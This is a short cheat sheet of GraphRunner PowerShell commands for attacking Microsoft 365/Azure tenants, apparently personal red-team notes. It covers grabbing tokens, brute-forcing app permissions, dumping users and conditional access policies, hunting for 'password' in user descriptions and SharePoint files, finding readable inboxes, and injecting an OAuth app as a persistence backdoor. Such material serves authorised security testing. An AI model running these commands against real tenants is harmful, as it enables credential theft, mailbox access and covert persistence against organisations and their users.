# GraphRunner

Awesome tool for enumerating/attacking Azure. This page has some practical attacks. And this blog had some nice tips as well. I also enjoyed this presentation. Also I just saw this GraphRunner cheatsheet updated in August of 2025!

# Authenticate

get-graphtokens

# Get your tenantid

get-tenantid -domain yourdomain.com

# Grab access token to clipboard

$token | Select-Object -ExpandProperty access_token | Set-Clipboard

# Enumerate ALL the permissions

Invoke-BruteClientIDAccess -domain example.com -refreshToken $tokens.refresh_token

# Run the kitchen sink and GraphRun all the things!

invoke-graphrunner -tokens $tokens

# Run with specific tests disabled

Invoke-GraphRunner -Tokens $tokens -DisableRecon -DisableUsers -DisableGroups -DisableCAPS -DisableApps -DisableEmail -DisableTeams

# Dump conditional access policies

invoke-dumpcaps -tokens $tokens -resolveguids

# Get users with the word "password" in their descriptions

Invoke-SearchUserAttributes -Tokens $tokens -SearchTerm "password"

# Get ALL users

get-azureadusers -tokens $tokens -outfile users.txt

# See if you can read any inboxes of those users

Invoke-GraphOpenInboxFinder -tokens $tokens -userlist .\users.txt

# Get groups / updatable groups / dynamic groups

Get-SecurityGroups -Tokens $tokens -OutputFile groups.txt

Get-UpdatableGroups -Tokens $tokens

Get-DynamicGroups -Tokens $tokens

# Get SharePoint URLs

Get-SharePointSiteURLs -Tokens $tokens

# Find interesting SharePoint/OneDrive files

For example, those containing the word "password":

Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm "password" -OutFile sharepoint-password-search

# "Inject" a trustworthy app for persistence

Invoke-InjectOAuthApp -AppName "Test App September 2025" -ReplyUrl "http://testing123" -scope "op backdoor" -Tokens $tokens